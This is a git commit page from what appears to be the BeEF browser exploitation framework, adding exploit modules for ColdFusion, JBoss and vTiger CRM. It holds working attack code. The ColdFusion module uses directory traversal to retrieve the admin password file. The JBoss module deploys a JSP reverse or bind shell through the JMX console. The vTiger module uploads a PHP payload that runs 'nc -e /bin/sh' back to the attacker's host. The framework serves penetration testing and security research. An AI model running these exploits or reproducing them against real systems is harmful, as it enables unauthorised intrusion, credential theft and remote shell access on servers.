Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

command modules re-organised and re-named

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1292 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
wade@bindshell.net
2011-09-16 12:28:14 +00:00
parent 9127bbeb88
commit e97104f696
69 changed files with 41 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files

47
modules/exploits/coldfusion_dir_traversal_exploit/command.js Normal file
View File

@@ -0,0 +1,47 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
* Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
* By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
* the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
beef.execute(function() {
fileToRetrieve = "<%= @fileToRetrieve %>";
targetOS = "<%= @os_combobox %>";
cf_version = "<%= @cf_version %>";
var uri = null;
if(targetOS == "Windows"){
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
}else{
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
}
beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
if(response.status_code == "success"){
titleStart = response.response_body.indexOf("<title>");
titleEnd = response.response_body.indexOf("</title>");
exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
}
});
});

25
modules/exploits/coldfusion_dir_traversal_exploit/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
coldfusion_dir_traversal_exploit:
enable: true
category: "Exploits"
name: "ColdFusion Directory Traversal Exploit"
description: "ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861)"
authors: ["antisnatchor"]
target:
working: ["ALL"]

36
modules/exploits/coldfusion_dir_traversal_exploit/module.rb Normal file
View File

@@ -0,0 +1,36 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

67
modules/exploits/jboss_jmx_upload_exploit/command.js Normal file
View File

@@ -0,0 +1,67 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* Jboss 6.0.0M1 JMX Upload Exploit
* Ported from l33tb0y Ruby code in Javascript by antisnatchor.
* HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port
*
* This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell.
* This is the stealthiest approach: nothing is shown on the logs
*/
beef.execute(function() {
rhost = "<%= @rhost %>";
rport = "<%= @rport %>";
lhost = "<%= @lhost %>";
lport = "<%= @lport %>";
injectedCommand = "<%= @injectedCommand %>";
jspName = "<%= @jspName %>";
payloadType = "<%= @payload %>";
reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
if(payloadType == "reverse"){
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E";
}else{
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E";
}
uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
/* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
if(response.status_code == "success"){
function triggerReverseConn(){
beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
if(response.status_code == "success"){
if(payloadType == "reverse"){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+".");
}
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
}
});
}
// give the time to JBoss to deploy the JSP reverse shell
setTimeout(triggerReverseConn,10000);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
}
});
});

25
modules/exploits/jboss_jmx_upload_exploit/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
jboss_jmx_upload_exploit:
enable: true
category: "Exploits"
name: "Jboss 6.0.0M1 JMX Deploy Exploit"
description: "Deploy a JSP reverse or bind shell (Metasploit one) using the JMX exposed deploymentFileRepository MBean of JBoss. The first request made is a HEAD one to bypass auth and deploy the malicious JSP, the second request is a GET one that triggers the reverse connection to the specified MSF listener.<br>Remember to run the MSF multi/hanlder listener with java/jsp_shell_reverse_tcp as payload, in case you are using the reverse payload."
authors: ["antisnatchor", "l33tb0y"]
target:
working: ["ALL"]

37
modules/exploits/jboss_jmx_upload_exploit/module.rb Normal file
View File

@@ -0,0 +1,37 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end

218
modules/exploits/vtiger_crm_upload_exploit/command.js Normal file
View File

@@ -0,0 +1,218 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// Ported to Ruby BeEF by xntrik 2010
beef.execute(function() {
//Doing the same trick I used in detect_tor to ensure exploit runs once
// xntrik
if (document.getElementById('vtigerimg')) {
//document.body.removeChild(document.getElementById('vtigerimg'));
//beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=There was a stagnant vtiger ID. Aborted!');
return "Exploit running already";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.id = 'vtigerimg';
document.body.appendChild(img);
baseurl = "<%= @vtiger_url %>";
function get_ajax() {
var http_request;
// use the ActiveX control for IE5.x and IE6
try {
http_request = new ActiveXObject("MSXML2.XMLHTTP");
} catch (othermicrosoft){
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (native) {
// If IE7, Mozilla, Safari, etc: Use native object
http_request = new XMLHttpRequest();
}
}
return http_request;
}
function do_upload(){
setTimeout(function() {ajax_upload()}, 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var http_request;
http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\r\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\r\n'
+ '\r\n'
+ 3000000 + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\r\n'
+ '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n'
+ 'Content-Type: application/x-httpd-php' + '\r\n'
+ '\r\n'
+ '<%= @vtiger_php %>' + '\r\n'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n'
+ '\r\n'
+ '<%= @mal_filename %>.<%= @mal_ext %>'
+ '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\r\n'
+ '\r\n'
+ 'drop it like its hot' + '\r\n'
+ boundary
+ '\r\n'
+ 'Content-Disposition: form-data; name="save"' + '\r\n'
+ '\r\n'
+ 'Attach' + '\r\n'
+ boundary;
var uploadstate = 0;
http_request.onreadystatechange = function() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
uploadstate = 3;
} else {
uploadstate = 2;
}
} else {
uploadstate = 1;
}
return;
};
http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
setTimeout(function() {
if (uploadstate == 0) {
//something went way wrong
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error in file upload');
} else if (uploadstate == 1) {
//we never got a response from the server
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server did not respond while trying to upload file');
} else if (uploadstate == 2) {
//we got a response that was NOT a 200
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Server gave an invalid response while trying to upload file');
} else if (uploadstate == 3) {
//We got a 200, so hopefully the file was uploaded
//be_graceful();
do_callfile(0, 1000);
}
},<%= @upload_timeout %>);
return;
}
function do_callfile(start, count){
if (document.getElementById('vtigerimg') == null) {
return false;
}
for (i=start;i<=start+count;i++)
{
var http_request = false;
http_request = get_ajax();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>";
var requestbody = "birds of a feather flock together";
http_request.open('POST', findurl, false);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
if (http_request.status == 200) {
document.body.removeChild(document.getElementById('vtigerimg'));
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=File Uploaded AND Executed ('+findurl+')');
return;
}
}
return;
}
// Try the upload
function do_main(){
do_upload();
return;
}
// Run the sploit
do_main();
});

25
modules/exploits/vtiger_crm_upload_exploit/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
vtiger_crm_upload_exploit:
enable: true
category: "Exploits"
name: "VTiger CRM Upload Exploit"
description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href=\"http://www.vtiger.com/\">vtiger 5.0.4</a><br />The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
target:
working: ["ALL"]

46
modules/exploits/vtiger_crm_upload_exploit/module.rb Normal file
View File

@@ -0,0 +1,46 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Vtiger_crm_upload_exploit < BeEF::Core::Command
def self.options
time = Time.new
weekno = case time.day
when 1..7 then 1
when 8..14 then 2
when 15..21 then 3
when 22..28 then 4
else 5
end
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
return [
{'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'},
{'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'},
{'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'},
{'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'},
{'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>','type'=>'textarea','width'=>'400px','height'=>'100px'},
{'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end